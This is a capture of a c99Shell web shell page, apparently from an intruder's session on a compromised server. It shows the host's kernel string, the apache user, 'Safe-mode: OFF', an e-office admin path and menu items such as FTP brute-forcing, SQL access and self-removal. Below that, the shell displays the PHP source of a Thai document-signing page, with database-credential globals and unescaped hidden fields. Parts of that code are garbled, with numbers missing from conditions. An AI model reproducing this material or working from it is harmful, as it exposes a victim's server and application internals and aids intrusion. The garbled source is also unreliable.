!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSignDoc.php (48.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsProposeType.php";
include_once 
"funct.php";
include_once 
"../class/clsannounceDocType.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clsDocWSign.php";
include_once 
"getPrefix.php";
include_once 
"../class/clsDocCommentSign.php";
include_once 
"../class/clsNoticeEditDoc.php";
include_once 
"../class/clsDocInboxStaff.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oPS2 = new person($oC);
$oPS3 = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc5 = new DocLineConfig($oC);
$oDlc6 = new DocLineConfig($oC);
$oDlc9 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp2 = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDatt = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oRs8 = new DocReceiveSend($oC);
$oRs9 = new DocReceiveSend($oC);
$oPt = new ProposeType($oC);
$oAn=new announceDocType($oC);
$oDws = new docwsign($oC);
$oDcs = new doccommentsign($oC);
$oNe = new NoticeEditDoc($oC);
$oNe1 = new NoticeEditDoc($oC);
$oDbxS = new DocInboxStaff($oC);
$oDbxS1 = new DocInboxStaff($oC);
$oDbxS3 = new DocInboxStaff($oC);
$oDbxS2 = new DocInboxStaff($oC);

$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();

if(
$_SESSION['DLCID'] && $_SESSION['one_position']!="1"){ include_once "selectposition.php";
?>

<?
    $oDoc
->SearchByKey($DocID); $oDoc->GetRecord();
    
$oDlc->SearchByKey($_SESSION['DLCID']); $oDlc->GetRecord(); 
    if(
$_SESSION['DLCIDSECOND']=="Y"){
        
$oDlc9->SearchByKey($_SESSION['DLCIDSECONDID']); $oDlc9->GetRecord(); 
        
$mypersonId=$oDlc9->personId;
    }else{
        
$mypersonId=$oDlc->personId;
    }    
    
$oRs->SearchByKey($DrsID); $oRs->GetRecord(); 
    
$oDlp2->SearchByKey($oDlc->DlpID); $oDlp2->GetRecord(); 
    

?>
<html>
<head>
<script language="javascript">
            var XMLHttpRequestObject=false;
            if(window.XMLHttpRequest){
                XMLHttpRequestObject=new XMLHttpRequest();
            }else if(window.ActiveXObject){
                XMLHttpRequestObject=new ActiveXObject("Microsoft.XMLHTTP");
            }
            function getData(data,divID){
                document.getElementById("div2").style.display = "";
                if(XMLHttpRequestObject){
                    var searchName = document.getElementById("name").value;
                    var obj = document.getElementById(divID);
                    data=data+"?name="+searchName;
                    
                    XMLHttpRequestObject.open("GET",data);
                    XMLHttpRequestObject.onreadystatechange=function(){
                        if(XMLHttpRequestObject.readyState==4 && 
                            XMLHttpRequestObject.status==200){
                            obj.innerHTML=XMLHttpRequestObject.responseText;
                        }
                    }
                    XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                    XMLHttpRequestObject.send(null);
                }
            }
</script>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<script src="getinfo.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table  width="100%"  align="center">
<tr><td >
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="signDoc.php">ลงนาม</a>
      <img src="../picture/ico3.gif" width="10" border="0" align="absmiddle">รายละเอียดข้อมูลการลงนามหนังสือ</font>
    </font></legend>
        <form name="ff"  METHOD="POST" action="processSignDoc.php">
        <table align="center" width="93%" >
        <tr>
          <td width="68%" height="25"><img src="../picture/official_letter.gif"   border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="3"><strong>การลงนามหนังสือ</strong></font> 
           </td>
          </tr>
        <tr>
          <td  colspan="3"><hr color="#000099"></hr>
          </td>
        </tr>
      </table>
      <br>
      <table width="93%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>" style="border-collapse:collapse">
      <tr><td colspan="2" background="../picture/table_header_bg2.gif" height="25">
     <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong> 
            &nbsp;รายละเอียดของหนังสือ: </strong></font> 
            <font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="2"><strong>
            <?   if($oDoc->RsID==1){    
                        echo 
$oRSt->SearchShowRsName(1); 
                    }else if(
$oDoc->RsID==2){   
                        echo 
$oRSt->SearchShowRsName(2); 
                    }else if(
$oDoc->RsID==3){  
                        echo 
$oRSt->SearchShowRsName(3); 
                    }else if(
$oDoc->RsID==4){  
                        echo 
$oRSt->SearchShowRsName(4); 
                    }
            
?>
            </strong></font>
            &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong> 
            &nbsp;ชนิดหนังสือ: </strong></font>
            <font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="2"><strong>
              <? $oDt->SearchByKey($oDoc->DtID);
                     
$oDt->GetRecord();
                     echo 
$oDt->DtName;
            
?>
            </strong></font>
      </td></tr>
      <tr>
      <? //---------detail doc------------------------------?>
      <td width="52%" align="center" valign="top">
              <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"><tr>
                  <td valign="top"> 
                    <table width="97%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#DADADA">
      <tr><td>&nbsp;</td></tr>
     <tr height=22><td width="32%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDocNo($oDoc->DtID); ?></strong></td>
             <td width="1%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DtID!="15"){   if($oDoc->DocNo!=""){  echo $oDoc->DocNo;   } }else{  echo '-';} ?></td></tr>
     <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDate2($oDoc->DtID); ?></strong></td>
             <td width="2%" align="center" ><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
            <?   if($oDoc->DocDate!="" && $oDoc->DocDate!="0000-00-00"){ 
                                        echo 
"&nbsp;".abbreDate2($oDoc->DocDate,'/');
                    } 
?>
            </td></tr>
     <? //if($oDoc->DtID!=13){ ?>
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>" >&nbsp;&nbsp;<strong><? echo ShowNameSubject($oDoc->DtID); ?></strong></td>
            <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<?  if($oDoc->DocSubject!=""){ echo  $oDoc->DocSubject;  } ?></td>
    </tr>
    <? //} ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==||  $oDoc->DtID==14 || $oDoc->DtID==13 || $oDoc->DtID==15){?>  
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameFrom($oDoc->DtID); ?></strong></td>
              <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocFrom!=""){ echo  $oDoc->DocFrom;  } ?></td>
          </tr>
    <? ?>
    <? if($oDoc->DtID==13){?>  
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชื่อผู้ได้รับการรับรอง</strong></td>
              <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->CertificatePs!=""){   echo $oDoc->CertificatePs; } ?></td>
          </tr>
    <? ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==2  || $oDoc->DtID==14 || $oDoc->DtID==|| $oDoc->DtID==15){?>
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? if($oDoc->DtID==|| $oDoc->DtID==15){   echo "เรียน"; }else{  echo "ถึง"; } ?></strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<?  if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }?></td>        
          </tr>
    <? }?>    
      <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>แฟ้มหนังสือ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td width="73%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
                  <? if($oDoc->DocPID=="0" || $oDoc->DocPID==""){  $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; } ?>
                   <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>"> 
                    &nbsp;<img src="../picture/attach_ico.gif"   border="0" >&nbsp;แฟ้มที่เกี่ยวข้อง&nbsp;<? echo a2th($oDatt->CountDocByDocID($searchDoc)); ?>&nbsp;รายการ
                    <? echo downloadProgramRead($oSys->downloadPpdf); ?></font><br> 
                    <? 
                        $oDatt
->SearchByDocID($searchDoc);
                        while(
$oDatt->GetRecord()){  
                            
$c++;  
                            
$pathfile=$GLOBALS['path_download_documents'].$oDatt->DaUpFileName
                        
?>
                            &nbsp;<a href="<? echo $pathfile ?>" target="_blank"><img src="../picture/allregistered_ico.gif" title="เปิดดูแฟ้มหนังสือ"  border="0"  style="cursor:pointer;" ></a>&nbsp; 
                        <?    echo "&nbsp;".$c.".&nbsp;".$oDatt->DaFileName."<br>";
                        } 
?>
                        <? include("uploadDocSended.php"); echo manageDocAtt2($searchDoc);?>
                  </td>                        
    </tr>
    <? if(($oDoc->DtID==|| $oDoc->DtID==2) && ($oDoc->RsID=="2" || $oDoc->RsID=="1")){?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึง</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocRef!=""){   echo $oDoc->DocRef; } ?></td>
    </tr>    
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>สิ่งที่ส่งมาด้วย</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocOther!=""){   echo $oDoc->DocOther; }?></td>
    </tr>
    <? ?>
    <? if($oDoc->DtID==&& ($oDoc->RsID=="4" || $oDoc->RsID=="3")){?>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึงหนังสือ<br>เพื่อตอบกลับ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocRefAns!=""){   echo $oDoc->DocRefAns; } ?></td>
    </tr>    
    <? ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==14 || $oDoc->DtID==15){?> 
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นความเร็ว</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
            <? $oDsl->SearchByKey($oDoc->DslID); $oDsl->GetRecord();  echo "&nbsp;".$oDsl->DslName;?>
             </td></tr>
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นความลับ</strong></td>
                   <td width="2%" align="center" ><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
                <? $oDcl->SearchByKey($oDoc->DclID); $oDcl->GetRecord();  echo "&nbsp;".$oDcl->DclName;?></td>
    </tr>
    <? ?>
    <? if($oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==14){?>  
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>หน่วยงานเจ้าของเรื่อง</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"><? if($oDoc->DocDeptOwner!=""){ echo  "&nbsp;".$oDoc->DocDeptOwner;  } ?></td>        
          </tr>
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>เบอร์โทรศัพท์เจ้าของเรื่อง</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"><? if($oDoc->DocTelOwner!=""){ echo  "&nbsp;".$oDoc->DocTelOwner;  } ?></td>        
          </tr>
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>โทรสารเจ้าของเรื่อง</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"><? if($oDoc->DocFaxOwner!=""){ echo  "&nbsp;".$oDoc->DocFaxOwner;  } ?></td>        
          </tr>
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>สำเนาส่ง</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"><? if($oDoc->DocCopySend!=""){ echo  "&nbsp;".$oDoc->DocCopySend;  } ?></td>        
          </tr>
       <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>การติดต่อทางอิเล็กทรอนิกส์</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"><? if($oDoc->DocContactE!=""){ echo  "&nbsp;".$oDoc->DocContactE;  } ?></td>        
          </tr>
    <? ?>    
    <tr height=22><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>หมายเหตุ</strong></td>
                   <td width="2%" align="center"><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"> 
                    <? if($oDoc->DocShortDesc!=""){ echo "&nbsp;".$oDoc->DocShortDesc;  }  ?>
                  </td>
                </tr>
<? if($oDoc->DocforSign=="Y"){  ?>
    <tr height=22><td width="25%">&nbsp;</td>
                   <td width="2%" align="center">&nbsp;</td>
                  <td > 
                  <input name="" type="checkbox" value="" checked disabled> ลงทะเบียนหนังสือลงนาม
                  </td>
                </tr>
    <? ?>
        <? if($oDoc->sendToPs=="Y"){  ?>
    <tr height=22><td width="25%">&nbsp;</td>
                   <td width="2%" align="center">&nbsp;</td>
                  <td > 
                  <input name="" type="checkbox" value="" checked disabled> ส่งด่วน
                  </td>
                </tr>
    <? ?>
                <? if(($oDoc->DtID==|| $oDoc->DtID==|| $oDoc->DtID==14) && $oDoc->DocSendReal=="Y"){?>  
                <tr height=22>
                  <td width="24%">&nbsp;</td>
                  <td width="1%" align="center">&nbsp;</td>
                  <td > <input name="" type="checkbox" value="" checked disabled>
                    ส่งหนังสือตัวจริงตามไปด้วย </td>
                </tr>
                <? ?>    
    <tr><td>&nbsp;</td></tr>    <tr><td colspan="3">
    <? if($oDoc->DocPID=="0"){  ?>
    <table width="100%">
    <tr><td colspan="3" align="left" ><hr color="#000099"></hr>
    แจ้งให้ผู้เสนอลงนามแก้ไขข้อมูลรายละเอียดหนังสือ</td></tr>
    <tr><td colspan="3" height="25" valign="bottom"><b>ข้อความแจ้งแก้ไข</b></td></tr>
    <tr><td colspan="3" valign="top"><textarea name="noticecomment" cols="40" rows="3" <? echo showtextarea('noticecomment',$InputThai); ?>></textarea><input name="Input" type="button" value=" แจ้ง "  <? if($oDlc->DlcActive!='Y'){  echo "disabled";  }  ?> onClick="return noticeDoc()"></td></tr>
    </table>
    <? ?>
    </td></tr>                
      </table>
              </td></tr></table>
              </td>
      <? //---------propose doc------------------------------
      
                        
?>
      <td width="48%" align="center" valign="top">
      <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"><tr><td >
              <table width="97%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA">
                <tr  height=25 valign="middle">
                  <td colspan="3" height="25"> <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"><strong> 
            <br>&nbsp;รายละเอียดสำหรับลงนาม<br></strong></font></td>
                </tr>
                <?
                        $DlcPs
=GetUpPrePsSend($DLCID,$oDlc->deptId);         
                          if(
$DlcPs=="N"){  $NoSend=1?>
                          <tr><td colspan="3" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">ไม่ได้กำหนดสิทธิ์ผู้ส่งหนังสือ 
                          กรุณาติดต่อผู้รับผิดชอบระบบ</font></td> </tr>
                  <?    }else{
                                
$oDlc2->SearchByKey($DlcPs); $oDlc2->GetRecord(); 
                                
//if($oDlc2->personId=="0"){   $NoPs=1;
                        
?>
                           <!--tr><td colspan="3" align="center"><font color="<?php //echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">ไม่ได้กำหนดผู้มีสิทธิ์ส่งหนังสือ 
                          กรุณาติดต่อผู้รับผิดชอบระบบ</font></td> </tr-->
                          <? //    }
                          
}
                                  if(
$NoSend!=&& $NoPs!=1){
                            
?>
                            <tr>
                            <td width="33%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;&nbsp;<strong>การบันทึก<br>&nbsp;&nbsp;ต่อเนื่อง</strong></td>
                            <td width="1%" align="center"><strong>:</strong></td>
                            <td width="66%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="left">&nbsp; <? echo nl2br($oRs->DrsPropose);?>
                            </tr>        
                        <? }?>
                
                <tr height=40>
                  <td width="33%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;&nbsp;<strong>ผู้เสนอลงนาม</strong></td>
                  <td width="1%" align="center"><strong>:</strong></td>
                        <td width="66%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="center">&nbsp; 
                        <?     if($NoSend!=&& $NoPs!=1){
                                
$oPS->SearchByKey($oRs->DrsPsIDCreate); $oPS->GetRecord();  
                                echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."<br>"
                                
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
                                
$DlcIDReceive=$oDlc2->DlcID;
                            
?>
                          <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"> 
                          <?
                                
echo "&nbsp;&nbsp;&nbsp;(".$oDlp->DlpName.")";             
                          
?>
                          </font> 
                          <? }  ?>
                       
                        </td>
                </tr>
                <tr height=22>
                  <td rowspan="2" width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>">&nbsp;&nbsp;<strong>การบันทึก<br>&nbsp;&nbsp;ต่อเนื่อง</strong></td>
                  <td width="2%" align="center"><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>" align="left">
                  <table width="100%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"]; ?>"><tr><td ><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"><b>เลือกข้อความบันทึกต่อเนื่อง</b><br><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">(คลิก <img src=../picture/arrow_down.gif  border=0> เพื่อเลือก)</font></font></td></tr></table>
                   <div style="overflow: auto; height: 100px;">
                      <table align="left" width="93%">
                      <? $oDcs->RSdoccommentsign();
                            while(
$oDcs->GetRecord()){
                                    
$commentS=str_replace(' ','_',$oDcs->commentS);
                        
?><tr><td height="20"><img src=../picture/arrow_down.gif title=เลือก  border=0 style="cursor:pointer;" onclick=ShowInfoProposeSign('showSelectSign.php','div3','<? echo $commentS?>','<? echo $InputThai?>')> <? echo $oDcs->commentS?></td></tr>
                        <?      ?>
                      </table></div><br>
                 </td>
                </tr>
                <tr><td> </td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>"><span id="div3"><textarea name="DrsSign" id="DrsSign" cols="30" rows="5"  <? echo showtextarea('DrsSign',$InputThai); ?>></textarea></div>
                   </td></tr>
                <tr height=40>
                  <td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>">&nbsp;&nbsp;<strong>ผู้มีอำนาจลงนาม</strong></td>
                  <td width="2%" align="center" ><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>" align="center">
                  <?            $oPS->SearchByKey($oRs->DrsReceivePersonId); $oPS->GetRecord();  
                                echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."<br>"
                                
$oDlc5->SearchByKey($oRs->DlcID);  $oDlc5->GetRecord();    
                                
$oDlp1->SearchByKey($oDlc5->DlpID);  $oDlp1->GetRecord();
                
?>
                                <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">
                <?
                                
echo "&nbsp;&nbsp;&nbsp;(".$oDlp1->DlpName.")<br>"
                
?>
                                </font>
                  </td>
                </tr>
                
                <tr><td>&nbsp;</td><td colspan="2"><? if($oDlc->DlcSend=="Y"){  ?>&nbsp;<input name="cansend" type="checkbox" value="Y" <? if($oDoc->DtID==15 && $oDoc->DocPID!="0"){   echo 'disabled';}?> onClick="return SetCanEndDoc();" >&nbsp;ส่งถึงผู้รับผิดชอบ<? ?></td></tr>
                <tr><td>&nbsp;</td><td colspan="2">&nbsp;<input name="canendDoc" type="checkbox" value="Y" onClick="return SetEndDoc('<? echo $oDlc->DlcSend?>');">&nbsp;ยุติหนังสือ (ไม่ส่งถึงผู้รับผิดชอบ)</td></tr>                
                <tr><td>&nbsp;</td></tr>
                <tr height=25>
                  <td align="center" colspan="3"><? if($oDoc->DtID==15){  $DocForSign=1; }?>
                  <input type="submit" name="addsign" value="ลงนาม" onClick="return checkFormat('<? echo $NoSend?>','<? echo $NoPs;?>','<? echo $oDlc->DlcSend?>');" <? if($oDlc->DlcActive!='Y'){  echo "disabled";  }  ?>>
                 <? if($oDlp2->DlpPID!=0){?>
                  <input type="submit" name="addsign" value="<? echo $GLOBALS['DOCFORSIGNNAME'];?>" onClick="return checkFormat2('<? echo $GLOBALS['DOCFORSIGNNAME'];?>');" <? if($oDlc->DlcActive!='Y'){  echo "disabled";  }  ?>>
                 <? ?>
                 <input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'signDoc.php?page_id2=<? echo $page_id2;?>&selectpredocdatevalue=<? echo $selectpredocdatevalue;?>&searchpredocdate=<? echo $searchpredocdate?>&folderstaff2=<? echo $folderstaff2?>&forfolderstaff2=<? echo $forfolderstaff2;?>&searchNamePre=<? echo $searchNamePre;?>&searchNoPre=<? echo $searchNoPre;?>&searchDeptPre=<? echo $searchDeptPre;?>'">
                  <input type="hidden" name="method" id="method" >
                  <input type="hidden" name="DocID"  id="DocID"  value="<? echo $DocID?>">
                  <input type="hidden" name="DrsID" id="DrsID" value="<? echo $DrsID?>">
                   <input type="hidden" name="DlcID" id="DlcID" value="<? echo $oRs->DlcID?>">
                  <input type="hidden" name="personId" id="personId"  value="<? echo $oDlc->personId?>">
                  <input type="hidden" name="DocGroup" id="DocGroup"  value="<? echo $MaxDocGroup//echo $oDoc->DocGroup; ?>">
                <?  //หาคนที่จะส่งต่ออ่ะ ?>
                <input type="hidden" name="DlcPs" id="DlcPs"  value="<? echo $DlcPs?>">
                 <input type="hidden" name="DlcPsId" id="DlcPsId"  value="<? echo $oRs->DrsPsIDCreate?>">
                   <input type="hidden" name="DlcIDlogin"  id="DlcIDlogin"  value="<? echo $DLCID?>">
                   <input type="hidden" name="DocForSign"  id="DocForSign"  value="<? echo $DocForSign?>">
                   <input type="hidden" name="DocPID"   id="DocPID" value="<? echo $oDoc->DocPID?>">
                   <input type="hidden" name="DlcIDReceive"  id="DlcIDReceive"  value="<? echo $DlcIDReceive?>">
                     <input type="hidden" name="searchpredocdate" id="searchpredocdate"  value="<? echo $searchpredocdate?>"> 
                      <input type="hidden" name="selectpredocdatevalue"  id="selectpredocdatevalue"   value="<? echo $selectpredocdatevalue?>">
                      <input type="hidden" name="page_id2" id="page_id2"   value="<? echo $page_id2?>">
                <input type="hidden" name="folderstaff2" id="folderstaff2" value="<? echo $folderstaff2?>">
                <input type="hidden" name="forfolderstaff2"  id="forfolderstaff2" value="<? echo $forfolderstaff2?>">
                
                  <input type="hidden" name="searchNamePre" id="searchNamePre"  value="<? echo $searchNamePre?>">
                <input type="hidden" name="searchNoPre"  id="searchNoPre"  value="<? echo $searchNoPre?>">
                <input type="hidden" name="searchDeptPre"  id="searchDeptPre" value="<? echo $searchDeptPre?>">
                  </td>
                </tr>
              </table>
      </td></tr></table>
      </td>
      <? //---------end propose doc------------------------?>
      
      </tr></table>
      <? if($oNe1->NumRowNoticeEditDoc($DocID,$DrsID)!=0){ ?><br>
      <table width="93%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"  style="border-collapse:collapse">
      <tr><td colspan="2" background="../picture/table_header_bg2.gif" height="25"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>&nbsp;การแก้ไขข้อมูลหนังสือ</strong></font></td></tr>
      <tr><td>
      <? $i=0;
              
$oNe->SearchNumRowNoticeEditDoc($DocID,$DrsID); 
              while(
$oNe->GetRecord()){ ?>
    <table width="100%" border="0">
        <tr><td width="56%"><font color="#66CC00"><b>ครั้งที่ <? echo ($i+1);  ?></b></font> <b>สถานะ</b> <? echo showStatusNoticeDoc($oNe->statusDoc)?></td></tr>
        <? if($oNe->statusDoc==|| $oNe->statusDoc==2){  ?>
        <tr><td  height=22><b>ผู้แจ้งแก้ไข ::</b> <? $oPS->SearchByKey($oNe->PsCreate); $oPS->GetRecord();  
                                echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;  ?>&nbsp;(<?     $oDlc5->SearchByKey($oNe->DlcIDCreate);  $oDlc5->GetRecord();    
                                
